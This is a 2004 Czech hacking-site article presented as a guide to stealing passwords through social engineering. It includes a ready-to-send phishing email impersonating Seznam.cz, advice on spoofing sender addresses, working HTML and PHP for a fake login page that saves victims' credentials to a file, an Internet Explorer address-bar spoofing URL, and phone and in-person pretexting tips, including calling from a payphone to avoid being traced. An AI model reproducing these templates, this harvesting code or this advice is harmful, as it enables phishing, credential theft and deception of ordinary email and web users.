Psychologie - nejúčinnější způsob získávání hesel

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: Kub@z
Datum: 13.6.2004
Hodnocení/Hlasovalo: 1.77/264

Donucení oběťi, aby vám dala svoje heslo dobrovolně a aniž by o tom věděla, je asi nejrychleší a nejsnažší způsob získání hesla. Tento článek vám poradí, jak na to

V tomto článku se pokusím popsat základní formy "psychologického útoku".

1) Falešný email

Obtížnost: Velmi snadné
Proveditelnost: 95%
Účinnost: 40%
Riziko odhalení: Velmi velké

Tuto základní a nejjednodušší formu útoku už jsem popsal v článku o hackování emailu. Spočívá ve vytvoření emailové schránky s věrohodným jménem na stejném serveru, na kterém má email oběť (např. passwords@seznam.cz :)). Pak na email oběti pošlete zo této emailové schránky email ve znění např.:

Vážený uživateli,

z důvodu chystaného zrušení neaktivních emailových schránek, by
se mohlo stát, že by byl zrušen i Váš účet. Pokud tuto emailovou
schránku používáte, zašlete prosím na email passwords@seznam.cz
zprávu ve tvaru:

login: Váš login
pass: Vaše heslo

Tedy pokud máte emailovou schránku např. petr@seznam.cz a heslo
"ahoj" bude zaslaný email vypadat takto:

login: petr
pass: ahoj

Děkujeme za pochopení,

Team Seznam.cz

Zde vidíme jednu z forem psychologického nátlaku. Oběti zde hrozí, že pokud svoje jméno a heslo nepošle, bude její chránka zrušena. Tento nátlak můžete ještě zvýšit přidáním textu např.:

Vzhledem k tomu, že rušení emailů proběhne za 3 dny, doporučujeme
Vám, abyste potvrzovací email odeslal(a) co nejdříve.

Tento email si oběť přečte třeba až dva dny po datu doručení, zazmatkuje a heslo vám pošle. Ale přeci jen, pokud je oběť alespoň trochu inteligentní, dojde jí, že to, že se nás server ptá na naše heslo, nemá logiku. Proto je tento způsob vhodný hlavně na oběti, které toho moc o internetu a počítačích neví.

2) Rozšíření falešného emailu o falešnou adresu odesílatele

Obtížnost: Musíte umět spustit program :)
Proveditelnost: 95%
Účinnost: 50%
Riziko odhalení: Velké

Tento útok je vlastně jenom rozšíření přechozího typu. Spočívá v tom, že podvodnou emailovou zprávu pošlete jakoby z adresy, která je o trochu věrohodnější, než ta, kterou jste si vytvořili. Toho docílíte pomocí programů na odesílání fake mailů. "Fake mail" je email se sfalšouvanou hlavičkou. Můžete si tak nastavit i adresu odesílatele, a přeci jenom "admin@seznam.cz" vypadá o trochu líp, než třeba "pass_adm@seznam.cz". Programů tohoto typu naleznete na internetu spoustu. A pokud jste trochu chytřejší, příjdete na to, že k tomu můžete použít třeba i obyčejný Outlook Express. Stačí si najít nějaký free smtp server, nebo zprovoznit smtp server přímo na vašem počítači.

3) Vytvoření falešného formuláře

Obtížnost: Větší (znalost HTML a PHP)
Proveditelnost: 50%
Účinnost: 90%
Riziko odhalení: Velmi malé

Tato metoda spočívá ve vytvoření falešného formuláře, do kterého přinutíte oběť zadat její přihlašovací údaje. Toho docílíte tak, že si zaregistrujete na serveru, na kterém má oběť email nebo web, freehosting s věrohodnou adresou (např. servis.webzdarma.cz - mimochodem, v době psaní článku ještě existuje - moje stránka :)) a okopírujete standartní přihlašovací formulář na serveru (aby vypadal věrohodně, co se týče vzhledu). V této HTML stránce pak upravíte text nad přihlašovacími údaji např. na (originální :)):

Vážený uživateli webhostinových služeb serveru webzdarma.cz, dovolujeme si Vás upozornit, že se chystáme přejít na nový výkonnější systém a při této příležitosti také smažeme nepoužívané účty. Pokud si tedy chcete prodloužit platnost svého účtu, zadejte prosím své přihlašovací údaje do formuláře níže

Formulář pak musíte upravit tak, aby ho zpracovával váš PHP (samozřejmě můžete použít i jiný serverový scriptovací jazyk) script. Ten uloží zadané informace do souboru, nebo vám je pošle na mail (nebo je uloží do databáze apod.). Zde je příklad:

--- index.html ---
<html>
<body>
Vážený uživateli....
<form action="post.php" method="post">
Login: <input type="text" name="login"><br>
Heslo: <input type="password" name="heslo"><br>
<input type="submit" value="Odeslat">
</form>
</body>
</html>

--- post.php ---
<?

$file = @FOpen("hesla.txt", "r");
$data = @FRead($file,FileSize("hesla.txt"));
@FClose($file);

$file = FOpen("hesla.txt", "w");
FWrite($file,$data.$login." : ".$heslo."\n");
FClose($file);

?>

<html>
<body>
Vaše žádost byla vyřízena, děkujeme za spolupráci
</body>
</html>

Toto je jednoduchá ukázka toho, na jakém principu ten formulář vlastně funguje. Tato metoda je opravdu velmi účinná. Stačí potom jenom kamarádovi říct, aby se na danou stránku podíval, nebo cizí osobě můžete poslat fake mail.

4) Falešný formulář + fake mail + IE bar spoofing

Obtížnost: Velká
Proveditelnost: 80%
Účinnost: 80%
Riziko odhalení: Střední

pozn.: Tato metoda počítá s tím, že oběť používá nezapatchovaný Internet Explorer. Pokud tedy oběť používá jiný prohlížeč, rozhodně tuto metodu nezkoušejte!!!

Co dělat, když oběť email nebo www stránku na serveru, kde si nemůžete registrovat vlastní freehosting? Nyní řekněme, že oběť má emailovou schránku petr@seznam.cz. Vytvořte si formulář ve vzhledu Seznamu a nahrajte ho na libovlný účet třeba na webzdarma.cz. Pak pošlete oběti email, kterým oběť donutíte kliknout na odkaz, který do emailu přidáte. Možná si teď říkáte: "No jo, ale nebude trochu podezřelý, když ten formulář bude na wz?". Odpověď zní: Nebude. Sačí, aby si oběť myslela, že zobrazovaná stránka je na seznamu. Jak toho docílíme? Pomocí chyby v IE nazývané "Bar Spoofing". Spočívá v tom, že text zobrazený v panelu adresa neodpovídá adrese zobrazené stránky. Toho docílíme pomocí speciální série znaků v odkazu:

http://zobrazená_adresa%00@skutečná_adresa

Tedy v našem případě např.:

http://servis.seznam.cz%00@hackmail.webzdarma.cz

O tom, jestli to funguje i na vašem počítači se můžete přesvědčit ZDE. Tato metoda je opravdu velice účinná, akorát oběť musí klinkout na odkaz, který jste jí poslali, protože kdyby napsala oadresu přímo do prohlížeče, tak máte smůlu.

5) Získání hesla přes telefon

Obtížnost: Velmi velká
Proveditelnost: Závisí na vašich hereckých dovednostech
Účinnost: Závisí na vašich hereckých dovednostech
Riziko odhalení: Velké

Tato metoda spočívá v tom, že oběti zavoláte a pokusíte se ji přesvědčit, že jste zaměstnanec firmy, u které má oběť email, www stránku apod. Tato metoda je velmi obtížná a chce to hlavě se velmi dobře informovat o firmě, "pro kterou pracujete", protože kdyby se vás oběť najednou zeptala třeba: "Kolik stojí ta nová služba '2 emaily za cenu jednoho'" a vy byste nevěděli, o čem mluví, tak by to byl docela problém. Druhá důležitá věc je mít hovor připravený předem. Rozhodně nedoporučuji nějak výrazně improvizovat, protože pak se může stát, že se zamotáte do toho, co jste říkali a porzradíte se. A ta nejdůležitější věc je, perfektně to zahrát. Pokud se po dvaceti sekundách začnete histericky smát, nebo se vám roztřese hlas tak, že nebudete moct mluvit, tak vám to asi nevyjde. Poslední důležitá věc je, správně hovor zakončit, protože je žádoucí, aby oběť nezjistila, že je obětí :). Zkuste se třeba objeti zeptat, jak je spokojena se službami vašeho serveru a třeba jí nějaké další nabídnout, protože to dokáže vyvrátit pochybnosti.

A ještě jdna poznámka - volejte vždy z budky, protože vždy se může stát, že se prozradíte, a rozhodně by nebylo příjemé, kdyby si "oběť" zjistila vaše telefonní číslo a adresu a přišla si to s vámi vyříkat osobně

6) Získání hesla osobně od oběti

Obtížnost: Obrovská
Proveditelnost: Závisí na vašich hereckých dovednostech
Účinnost: Závisí na vašich hereckých dovednostech
Riziko odhalení: Obrovské

Tato metoda je prakticky stejná jako předchozí, až na to, že oběť navštívíte osobně a mluvíte s ní očí do očí, což už chce hodně pevné nervy. No a samozřejmě se můžete pokusit získat heslo, jako při telefonickém rozhovoru, nebo můžete oběť třeba přesvědčit, že jste technik (třeba Telecomu), který má vyřešit nějakou poruchu a oběti třeba nainstalovat do počítače trojana. Fantazii se meze nekladou... Ale toto je typ útoku, na který si rozhodně netroufám ani já, takže pokud se vám ho povede úspěšně realizovat, tak jste opravdu borci...

A to je pro tento článek vše :)